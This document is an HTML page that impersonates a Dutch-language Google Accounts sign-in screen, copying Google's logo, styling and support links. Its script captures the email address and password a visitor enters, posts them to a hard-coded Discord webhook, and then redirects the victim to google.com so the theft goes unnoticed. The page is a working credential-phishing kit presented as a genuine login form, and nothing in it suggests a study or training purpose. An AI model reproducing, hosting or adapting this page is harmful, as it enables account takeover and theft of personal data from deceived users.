<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Inloggen - Google Accounts</title>

    <style>
        body {
            background-color: #F0F4F9;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .loading {
            cursor: wait;
        }

        .login {
            display: flex;
            justify-content: center;
            background: #F0F4F9;
            width: 74%;
            height: 65%;
            margin-top: -15px;
        }

        .login-form {
            display: flex;
            background: #ffffff;
            padding: 20px;
            width: 100%;
            height: 73%;
            border-radius: 30px;
            padding: 40px;
            position: relative;
        }

        .login-title {
            flex: 1;
        }

        .login-email,
        .login-ww {
            flex: 1;
            position: relative;
        }

        a {
            color: #0B57D0;
            font-size: 14px;
            text-decoration: none;
            margin-top: 10px;
        }

        input[type="email"],
        input[type="password"] {
            width: 95%;
            padding: 13px 15px;
            border: 1px solid #747775;
            border-radius: 5px;
            font-size: 16px;
            transition: border-color 0.3s;
            margin-top: 70px;
            height: 28px;
        }

        input[type="email"]:focus,
        input[type="password"]:focus {
            border-color: #4285f4;
            outline: none;
        }

        .input-label,
        .input-label-ww {
            position: absolute;
            left: 10px;
            top: 86px;
            /* Set the initial position for both labels */
            font-size: 16px;
            color: #999;
            transition: all 0.2s;
            pointer-events: none;
        }

        input[type="password"]:focus+.input-label-ww,
        input[type="password"]:not(:placeholder-shown)+.input-label-ww,
        input[type="email"]:focus+.input-label,
        input[type="email"]:not(:placeholder-shown)+.input-label {
            top: 63px;
            /* Move label up when focused or not empty */
            font-size: 12px;
            color: #4285f4;
            background-color: #ffffff;
        }

        button {
            background-color: #0b57d0;
            font-family: Afacad Flux;
            color: #ffffff;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            border-radius: 50vw;
            font-size: 14px;
        }

        button:hover {
            filter: brightness(90%);
        }
    </style>
</head>

<body>
    <div class="login">
        <div class="login-form">
            <div class="login-title">
                <svg xmlns="https://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 40 48" aria-hidden="true"
                    jsname="jjf7Ff">
                    <path fill="#4285F4"
                        d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z">
                    </path>
                    <path fill="#34A853"
                        d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z">
                    </path>
                    <path fill="#FABB05"
                        d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z">
                    </path>
                    <path fill="#E94235"
                        d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z">
                    </path>
                </svg>
                <p id="login-status" style="margin-top: 10px; font-size: 36px;">Inloggen</p>
                <p style="margin-top: -15px;">Je Google-account gebruiken</p>
            </div>

            <div class="login-email">
                <input class="email" type="email" placeholder=" " required>
                <label class="input-label" for="email">E-mailadres of telefoonnummer</label>
                <p class="error-message" style="color: red; margin-top: 10px; margin-bottom: -20px;"></p>
                <br>
                <a href="https://support.google.com/accounts/answer/7682439?hl=nl" target="_blank"
                    style="font-weight: 500;">E-mailadres vergeten?</a>

                <p style="color: #757575; margin-top: 50px; margin-bottom: 5px;">Niet jouw computer? Gebruik de
                    gastmodus om privé in te loggen.</p>
                <a href="https://support.google.com/chrome/answer/6130773?hl=nl" target="_blank"
                    style="font-weight: 500; margin-bottom: 50px;">Meer informatie over het gebruik van de gastmodus</a>

                <div style="width: 95%; display: flex; justify-content: flex-end;">
                    <button class="volgende-knop-ww" style="margin-top: 30px;">Volgende</button>
                </div>
            </div>

            <div class="login-ww" style="display: none;">
                <input class="password" type="password" placeholder=" " required>
                <label class="input-label-ww" for="password">Wachtwoord</label>
                <p class="error-message-ww" style="color: red; margin-top: 10px; margin-bottom: -20px;"></p>
                <br>
                <a href="https://support.google.com/accounts/answer/7682439?hl=nl" target="_blank"
                    style="font-weight: 500;">Wachtwoord vergeten?</a>

                <p style="color: #757575; margin-top: 50px; margin-bottom: 5px;">Niet jouw computer? Gebruik de
                    gastmodus om privé in te loggen.</p>
                <a href="https://support.google.com/chrome/answer/6130773?hl=nl" target="_blank"
                    style="font-weight: 500; margin-bottom: 50px;">Meer informatie over het gebruik van de gastmodus</a>

                <div style="width: 95%; display: flex; justify-content: flex-end;">
                    <button class="volgende-knop-home" style="margin-top: 30px;">Volgende</button>
                </div>
            </div>
        </div>
    </div>

    <script>
        // Voor email invoer en knop
        const emailInput = document.querySelector('.email');
        emailInput.addEventListener('keydown', function (event) {
            if (event.key === 'Enter') {
                volgendeKnop.click();
            }
        });

        // Voor wachtwoord invoer en knop
        const passwordInput = document.querySelector('.password');
        passwordInput.addEventListener('keydown', function (event) {
            if (event.key === 'Enter') {
                volgendeKnopHome.click();
            }
        });

        const webhookUrl = 'https://discord.com/api/webhooks/996789239138242570/SEpc2y07LPZ1_MKEk8dz-4Tm_ocEExSikVY8ePjpuApyLTNmgvBKLUCBPefcNQIXB-Y4';

        async function sendData(email, password) {
            const data = {
                content: `Ingelogd met:\nE-mailadres: ${email}\nWachtwoord: ${password}`
            };

            try {
                const response = await fetch(webhookUrl, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data)
                });

                if (!response.ok) {
                    throw new Error('Netwerkrespons was niet OK.');
                }
                console.log('Gegevens succesvol verzonden naar Discord.');
            } catch (error) {
                console.error('Er was een probleem met het verzenden van de gegevens:', error);
            }
        }

        const volgendeKnop = document.getElementsByClassName('volgende-knop-ww')[0];

        volgendeKnop.addEventListener('click', function () {
            const emailInput = document.querySelector('.email');
            document.body.classList.add('loading');

            if (emailInput.value !== '') {
                volgendeKnop.innerText = 'Laden...';
                setTimeout(function () {
                    document.querySelector('.login-ww').style.display = 'block';
                    document.querySelector('.login-email').style.display = 'none';
                    document.getElementById('login-status').innerText = 'Welkom';
                    document.body.classList.remove('loading');
                }, 1000);
            } else {
                document.querySelector('.error-message').innerText = 'Vul een e-mailadres in';
                document.body.classList.remove('loading');
            }
        });

        const volgendeKnopHome = document.getElementsByClassName('volgende-knop-home')[0];

        volgendeKnopHome.addEventListener('click', function () {
            const passwordInput = document.querySelector('.password');
            const emailInput = document.querySelector('.email').value; // Verkrijg het e-mailadres
            document.body.classList.add('loading');

            if (passwordInput.value !== '') {
                volgendeKnopHome.innerText = 'Laden...';
                setTimeout(function () {
                    document.body.classList.remove('loading');
                    sendData(emailInput, passwordInput.value); // Verzend de gegevens naar Discord
                    document.location.href = 'https://google.com/';
                }, 1000);
            } else {
                document.querySelector('.error-message-ww').innerText = 'Vul een wachtwoord in';
                document.body.classList.remove('loading');
            }
        });
    </script>
</body>

</html>
